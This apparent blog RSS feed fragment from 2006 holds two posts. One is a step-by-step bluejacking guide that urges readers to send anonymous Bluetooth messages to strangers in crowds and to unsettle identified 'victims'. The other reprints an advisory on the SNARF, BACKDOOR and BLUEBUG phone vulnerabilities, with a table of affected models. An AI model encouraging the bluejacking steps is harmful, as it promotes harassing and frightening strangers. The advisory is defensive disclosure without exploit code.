<p><span lang="en-gb">Bluejacking relies on the vast numbers of      mobile phones that are shipped as &#8220;visible&#8221; from the factory, or the users      who leave their phones set to visible for ease of use, instead of searching      for a phone to pair with a bluejacker will search for phones within range      and then send a contact from their phones memory which will appear as a      message on the screen of the other mobile.</span></p>
<p><span lang="en-gb">This unsolicited message looks to all      intents like an SMS but the user is mystified as it does not have a phone      number or indeed anyway of tracing its sender, messages tend to be quite      limited as most mobiles will only display the first line of the contact on      the screen, but that is normally room to come up with something amusing.</span></p>
<p><span lang="en-gb">Time for the easy steps that show you how      to bluejack.</span></p>
<p><span lang="en-gb"><strong>1.</strong> Select your area carefully, you      need an area with plenty of mobile users, stations and areas with business      men and women are best but supermarkets and other places with large groups      of people are also good.</span></p>
<p><span lang="en-gb"><strong>2.</strong> You&#8217;ll want to pre prepare a few      contacts to send, fill in the first line and perhaps some of the other      parameters like email, but most bluejack victims will only see the first      line, it is possible to send photos too this can be great once you have      identified a victim.</span></p>
<p><span lang="en-gb"><strong>3. </strong>Scan for Bluetooth enabled      phones, go into your phone&#8217;s contacts select the card you have already made      and select &#8220;send via Bluetooth&#8221; this will start a search for all Bluetooth      devices within a 10 meter range.</span></p>
<p><span lang="en-gb"><strong>4. </strong>You will see a list of the phone      names in range, pay attention as these will often be the phone model name      useful for identifying who you have bluejacked or at least amusing to find      who has a phone named &#8220;sexy bum&#8221;, quickly select one phone and send the      contact, Bluetooth will take a while to deliver the contact so speed is      important to get your victim before they move out of range.</span></p>
<p><span lang="en-gb"><strong>5.</strong> Having sent the contact you      should get the confirmation &#8220;card sent&#8221; and then listen for the SMS message      tone of your victims phone. Success you&#8217;ve Bluejacked!</span></p>
<p><span lang="en-gb"><strong>6.</strong> If you can identify who you      managed to Bluejack then you can follow up with a specific message which      will really freak out your victim, for example &#8221; hey that&#8217;s a funky hat&#8221; or      &#8220;what train are you catching&#8221; the best messages are often very humorous and      should amuse your victim.</span></p>
<p><span lang="en-gb">So that&#8217;s Bluejacking, there are a few      limited software applications which can run on Sony Ericsson phones such as      SMAN.</span></p>
<p><span lang="en-gb">Bluesnarfing and Bluestumbling are both      more intrusive uses of Bluetooth technology, Bluesnarfing is the process of      connecting to a mobile device and copying the contents without      authorisation, this vulnerability is limited to a handful of Sony Ericsson      and Nokia Phones. Bluetumbling is similar but the vulnerability can only be      exploited by a device that was previously paired but has since been removed      from the mobile device list, so not really anything to lose sleep over.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.mobiletechblog.com/2006/02/10/how-to-bluejack/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Security Vulnerabilities Of Mobile Phones</title>
		<link>http://www.mobiletechblog.com/2006/02/06/security-vulnerabilities-of-mobile-phones/</link>
		<comments>http://www.mobiletechblog.com/2006/02/06/security-vulnerabilities-of-mobile-phones/#comments</comments>
		<pubDate>Mon, 06 Feb 2006 17:05:54 +0000</pubDate>
		<dc:creator>PRiTAM</dc:creator>
				<category><![CDATA[Viruses & Vulnerabilities]]></category>

		<guid isPermaLink="false">http://mobiletechblog.com/2006/02/06/security-vulnerabilities-of-mobile-phones/</guid>
		<description><![CDATA[In November 2003, Adam Laurie of A.L. Digital Ltd. discovered that there are serious flaws in the authentication and/or data transfer mechanisms on some bluetooth enabled devices. Specifically, three vulnerabilities have been found: 
Firstly, confidential data can be obtained, anonymously, and without the owner&#8217;s knowledge or consent, from some bluetooth enabled mobile phones. This data [...]]]></description>
			<content:encoded><![CDATA[<p><font size="3"><font face="Times New Roman">In November 2003, Adam Laurie of A.L. Digital Ltd. discovered that there are serious flaws in the authentication and/or data transfer mechanisms on some bluetooth enabled devices. Specifically, three vulnerabilities have been found: </font></font></p>
<p><font size="3" face="Times New Roman"><strong>Firstly</strong>, confidential data can be obtained, anonymously, and without the owner&#8217;s knowledge or consent, from some bluetooth enabled mobile phones. This data includes, at least, the entire phonebook and calendar, and the phone&#8217;s IMEI. </font></p>
<p><font size="3" face="Times New Roman"><strong>Secondly</strong>, it has been found that the complete memory contents of some mobile phones can be accessed by a previously trusted (&#8221;paired&#8221;) device that has since been removed from the trusted list. This data includes not only the phonebook and calendar, but media files such as pictures and text messages. In essence, the entire device can be &#8220;backed up&#8221; to an attacker&#8217;s own system. </font></p>
<p><font size="3" face="Times New Roman"><strong>Thirdly</strong>, access can be gained to the AT command set of the device, giving full access to the higher level commands and channels, such as data, voice and messaging. This third vulnerability was identified by Martin Herfurt, and they have since started working together on finding additional possible exploits resulting from this vulnerability. </font></p>
<p><font size="3" face="Times New Roman"><strong>Finally</strong>, the current trend for &#8220;Bluejacking&#8221; is promoting an environment which puts consumer devices at greater risk from the above attacks. </font></p>
<p><font size="3" face="Times New Roman"><br />
<strong>Vulnerabilities</strong></font></p>
<p><font size="3"><font face="Times New Roman"><strong>The SNARF attack:</strong> </font></font><font size="3"><font face="Times New Roman"><br />
It is possible, on some makes of device, to connect to the device without alerting the owner of the target device of the request, and gain access to restricted portions of the stored data therein, including the entire phonebook (and any images or other data associated with the entries), calendar, realtime clock, business card, properties, change log, IMEI (International Mobile Equipment Identity [6], which uniquely identifies the phone to the mobile network, and is used in illegal phone &#8216;cloning&#8217;). This is normally only possible if the device is in &#8220;discoverable&#8221; or &#8220;visible&#8221; mode, but there are tools available on the Internet that allow even this safety net to be bypassed[4]. Further details will not be released at this time (see below for more on this), but the attack can and will be demonstrated to manufacturers and press if required. </font></font></p>
<p><font size="3"><font face="Times New Roman"><strong>The BACKDOOR attack:</strong><br />
The backdoor attack involves establishing a trust relationship through the &#8220;pairing&#8221; mechanism, but ensuring that it no longer appears in the target&#8217;s register of paired devices. In this way, unless the owner is actually observing their device at the precise moment a connection is established, they are unlikely to notice anything untoward, and the attacker may be free to continue to use any resource that a trusted relationship with that device grants access to (but note that so far we have only tested file transfers). This means that not only can data be retrieved from the phone, but other services, such as modems or Internet, WAP and GPRS gateways may be accessed without the owner&#8217;s knowledge or consent. Indications are that once the backdoor is installed, the above SNARF attack will function on devices that previously denied access, and without the restrictions of a plain SNARF attack, so we strongly suspect that the other services will prove to be available also. </font></font></p>
<p><font size="3"><font face="Times New Roman"><strong>The BLUEBUG attack:</strong><br />
The bluebug attack creates a serial profile connection to the device, thereby giving full access to the AT command set, which can then be exploited using standard off the shelf tools, such as PPP for networking and gnokii for messaging, contact management, diverts and initiating calls. With this facility, it is possible to use the phone to initiate calls to premium rate numbers, send sms messages, read sms messages, connect to data services such as the Internet, and even monitor conversations in the vicinity of the phone. This latter is done via a voice call over the GSM network, so the listening post can be anywhere in the world. Bluetooth access is only required for a few seconds in order to set up the call. Call forwarding diverts can be set up, allowing the owner&#8217;s incoming calls to be intercepted, either to provide a channel for calls to more expensive destinations, or for identity theft by impersonation of the victim. </font></font></p>
<p><font size="3"><font face="Times New Roman"><strong>Bluejacking:</strong><br />
Although known to the technical community and early adopters for some time, the process now known as &#8220;Bluejacking&#8221;[1] has recently come to the fore in the consumer arena, and is becoming a popular mechanism for exchanging anonymous messages in public places. The technique involves abusing the bluetooth &#8220;pairing&#8221;[2] protocol, the system by which bluetooth devices authenticate each other, to pass a message during the initial &#8220;handshake&#8221; phase. This is possible because the &#8220;name&#8221; of the initiating bluetooth device is displayed on the target device as part of the handshake exchange, and, as the protocal allows a large user defined name field &#8211; up to 248 characters &#8211; the field itself can be used to pass the message. This is all well and good, and, on the face of it, fairly harmless, but, unfortunately, there is a down side. There is a potential security problem with this, and the more the practice grows and is accepted by the user community, and leveraged as a marketing tool by the vendors, the worse it will get. The problem lies in the fact that the protocol being abused is designed for information exchange. The ability to interface with other devices and exchange, update and synchronise data, is the raison d&#8217;être of bluetooth. The bluejacking technique is using the first part of a process that allows that exchange to take place, and is therefore open to further abuse if the handshake completes and the &#8220;bluejacker&#8221; successfully pairs with the target device. If such an event occurs, then all data on the target device bacomes available to the initiator, including such things as phone books, calendars, pictures and text messages. As the current wave of PDA and telephony integration progresses, the volume and quality of such data will increase with the devices&#8217; capabilities, leading to far more serious potential compromise. Given the furore that errupted when a second-hand Blackberry PDA was sold without the previous owner&#8217;s data having been wiped[3], it is alarming to think of the consequences of a single bluejacker gathering an entire corporate staff&#8217;s contact details by simply attending a conference or camping outside their building or in their foyer with a bluetooth capable device and evil intent. Of course, corporates are not the only potential targets &#8211; a bluejacking expedition to, say, The House of Commons, or The US Senate, could provide some interesting, valuable and, who&#8217;s to say, potentially damaging or compromising data. </font></font></p>
<p><font size="3" face="Times New Roman">The above may sound alarmist and far fetched, and the general reaction would probably be that most users would not be duped into allowing the connection to complete, so the risk is small. However, in today&#8217;s society of instant messaging, the average consumer is under a constant barrage of unsolicted messages in one form or another, whether it be by SPAM email, or &#8220;You have won!&#8221; style SMS text messages, and do not tend to treat them with much suspicion (although they may well be sceptical about the veracity of the offers). Another message popping up on their &#8216;phone saying something along the lines of &#8220;You have won 10,000 pounds! Enter this 4 digit PIN number and then dial 0900-SUCKER to collect your prize!&#8221; is unlikely to cause much alarm, and is more than likely to succeed in many cases. </font></p>
<p><font size="3"><font face="Times New Roman"><strong>Workarounds and fixes</strong><br />
We are not aware of any workarounds for the SNARF or BLUEBUG attacks at this time, other than to switch off bluetooth. For permanent fixes, see the &#8216;Fixes&#8217; section at the bottom of the page. </font></font></p>
<p><font size="3" face="Times New Roman">To permanently remove a pairing, and protect against future BACKDOOR attacks, it seems you must perform a factory reset, but this will, of course, erase all your personal data. </font></p>
<p><font size="3" face="Times New Roman">To avoid Bluejacking, &#8220;just say no&#8221;. <img src='http://www.mobiletechblog.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  </font></p>
<p><font size="3" face="Times New Roman">The above methods work to the best of our knowledge, but, as the devices affected are running closed-source proprietory software, it not possible to verify that without the collaboration of the manufacturers. We therefore make no claims as to the level of protection they provide, and you must continue to use bluetooth at your own risk. </font></p>
<p><font size="3"><font face="Times New Roman"><strong>Who&#8217;s Vulnerable</strong><br />
To date the quantity of devices tested is not great. However, due to the fact that they are amongst the most popular brands, we still consider the affected group to be large. It is also assumed that there are shared implementations of the bluetooth stack, so what affects one model is likely to affect others. This table is accurate to the best of our knowledge, but without the cooperation of the manufacturers (which we currently do not have), it is not possible to conduct more extensive validation.</font></font></p>
<p><font size="3" face="Times New Roman"><strong>The devices known to be vulnerable at this time are:</strong></font></p>
<div align="center">
<table cellspacing="1" cellpadding="0" border="0">
<tr>
<td colspan="7" style="width: 99%"><font size="3"><font face="Times New Roman"><strong>Vulnerability Matrix <em>(* = NOT Vulnerable)</em></strong><br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman"><strong>Make</strong><br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman"><strong>Model</strong><br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman"><strong>Firmware Rev</strong><br />
</font></font></td>
<td style="width: 9%"><font face="Times New Roman"><strong>BACKDOOR</strong><strong><br />
</strong></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman"><strong>SNARF when<br />
Visible</strong><br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman"><strong>SNARF when<br />
NOT Visible</strong><br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman"><strong>BUG</strong><br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Ericsson<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">T68<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">20R1B<br />
20R2A013<br />
20R2B013<br />
20R2F004<br />
20R5C001<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Sony Ericsson<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">R520m<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">20R2G<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Sony Ericsson<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">T68i<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">20R1B<br />
20R2A013<br />
20R2B013<br />
20R2F004<br />
20R5C001<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Sony Ericsson<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">T610<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">20R1A081<br />
20R1L013<br />
20R3C002<br />
20R4C003<br />
20R4D001<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Sony Ericsson<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">T610<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">20R1A081<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Sony Ericsson<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">Z1010<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Sony Ericsson<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">Z600<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">20R2C007<br />
20R2F002<br />
20R5B001<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Nokia<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">6310<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">04.10<br />
04.20<br />
4.07<br />
4.80<br />
5.22<br />
5.50<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Nokia<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">6310i<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">4.06<br />
4.07<br />
4.80<br />
5.10<br />
5.22<br />
5.50<br />
5.51<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Nokia<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">7650<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">No (+)<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Nokia<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">8910<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Nokia<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">8910i<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">* Siemens<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">S55<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">* Siemens<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">SX1<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Motorola<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">V600 (++)<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
</tr>
<tr>
<td style="width: 14%"><font size="3"><font face="Times New Roman">Motorola<br />
</font></font></td>
<td style="width: 13%"><font size="3"><font face="Times New Roman">V80 (++)<br />
</font></font></td>
<td style="width: 11%"><font size="3"><font face="Times New Roman">?<br />
</font></font></td>
<td style="width: 9%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 16%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 14%"><font size="3"><font face="Times New Roman">No<br />
</font></font></td>
<td style="width: 17%"><font size="3"><font face="Times New Roman">Yes<br />
</font></font></td>
</tr>
</table>
</div>
<div align="center"><font size="3" face="Times New Roman" /></p>
<div align="center"><font size="3" face="Times New Roman"><font size="3" face="Times New Roman"><font size="3" face="Times New Roman"><font size="3" face="Times New Roman">+ <strong><em>The 7650 is only vulnerable to SNARF if it has already been BACKDOORed.</em></strong><br />
++ <strong><em>The V600 and V80 are discoverable for only 60 seconds,when first powered on or when this feature is user selected,and the window for BDADDR discovery is therefore very small.Motorola have stated that they will correct the vulnerability in current firmware.</em></strong></font></font></font></font></div>
<div align="center"></div>
<div align="left"><p>Technorati Tags: <a href="http://technorati.com/tag/mobile+security" rel="tag">mobile security</a>, <a href="http://technorati.com/tag/cellphone+security" rel="tag"> cellphone security</a>, <a href="http://technorati.com/tag/mobile+vulnerabitiy" rel="tag"> mobile vulnerabitiy</a>, <a href="http://technorati.com/tag/bluetooth+hacking" rel="tag"> bluetooth hacking</a></p></div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.mobiletechblog.com/2006/02/06/security-vulnerabilities-of-mobile-phones/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
